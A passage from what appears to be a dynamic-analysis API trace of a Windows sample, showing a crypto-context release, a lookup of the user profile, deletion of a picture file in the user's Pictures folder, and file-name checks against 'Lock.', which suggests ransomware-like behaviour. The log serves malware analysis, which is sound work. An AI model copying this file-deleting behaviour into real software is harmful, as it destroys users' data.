lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.935] CryptReleaseContext (hProv=0xa7bcd0, dwFlags=0x0) returned 1 [0211.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.935] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.935] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.935] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.935] CloseHandle (hObject=0x504) returned 1 [0211.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.941] CloseHandle (hObject=0x4f4) returned 1 [0211.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.942] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.942] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.942] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0211.943] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Wi_9DL5txr1IbTGlf8.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Wi_9DL5txr1IbTGlf8.bmp", lpFilePart=0x8cedf4*="Wi_9DL5txr1IbTGlf8.bmp") returned 0x2f [0211.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b20 | out: hHeap=0x2af0000) returned 1 [0211.943] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Wi_9DL5txr1IbTGlf8.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\wi_9dl5txr1ibtglf8.bmp")) returned 0x20 [0211.944] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Wi_9DL5txr1IbTGlf8.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3689d1c0, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0x33747c30, ftLastAccessTime.dwHighDateTime=0x1d5cf46, ftLastWriteTime.dwLowDateTime=0x33747c30, ftLastWriteTime.dwHighDateTime=0x1d5cf46, nFileSizeHigh=0x0, nFileSizeLow=0x51aa, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Wi_9DL5txr1IbTGlf8.bmp", cAlternateFileName="WI_9DL~1.BMP")) returned 0x9e1cb8 [0211.944] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Wi_9DL5txr1IbTGlf8.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\wi_9dl5txr1ibtglf8.bmp")) returned 1 [0211.946] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3689d1c0, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0x33747c30, ftLastAccessTime.dwHighDateTime=0x1d5cf46, ftLastWriteTime.dwLowDateTime=0x33747c30, ftLastWriteTime.dwHighDateTime=0x1d5cf46, nFileSizeHigh=0x0, nFileSizeLow=0x51aa, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Wi_9DL5txr1IbTGlf8.bmp", cAlternateFileName="WI_9DL~1.BMP")) returned 0 [0211.946] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0211.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.946] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.947] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.947] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.948] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0211.989] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Wi_9DL5txr1IbTGlf8.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Wi_9DL5txr1IbTGlf8.bmp", lpFilePart=0x8cf650*="Wi_9DL5txr1IbTGlf8.bmp") returned 0x2f [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0211.989] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Wi_9DL5txr1IbTGlf8.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\wi_9dl5txr1ibtglf8.bmp")) returned 0xffffffff [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.989] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0211.989] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.989] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y1E-1EvHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1E-1EvHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-1EvHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-1EvHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1EvHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EvHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vHMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HMk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mk4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vp8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.991] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.991] RtlAllocateHeap 